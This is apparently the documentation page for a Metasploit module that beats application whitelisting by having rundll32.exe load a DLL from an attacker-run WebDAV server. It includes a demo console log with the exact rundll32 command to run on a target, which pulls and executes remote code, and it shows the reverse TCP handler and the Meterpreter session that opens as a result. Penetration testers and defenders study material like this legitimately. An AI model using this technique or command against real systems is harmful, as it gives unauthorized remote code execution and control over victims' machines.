1.8 KiB
Introduction
This module simplifies the rundll32.exe Application Whitelisting Bypass technique
The module creates a webdav server that hosts a dll file. When the user types the provided rundll32 command on a system, rundll32 will load the dll remotly and execute the provided export function.
The export function needs to be valid, but the default meterpreter function can be anything.
The process does write the dll to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
but does not load the dll from that location. This file should be removed after execution.
The extension can be anything you'd like, but you don't have to use one. Two files will be written to disk. One named the requested name and one with a dll extension attached.
Please note that there is a slight delay for the target to start making WebDAV requests, and then getting a session back.
Demo
msf5 exploit(windows/misc/webdav_delivery) > run
[*] Exploit running as background job 3.
[*] Started reverse TCP handler on 172.16.249.1:4444
msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\172.16.249.1@8080\ANYTHING,Init
[*] 172.16.249.130 webdav_delivery - GET /ANYTHING
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600
msf5 exploit(windows/misc/webdav_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/windows 172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130)
msf5 exploit(windows/misc/webdav_delivery) >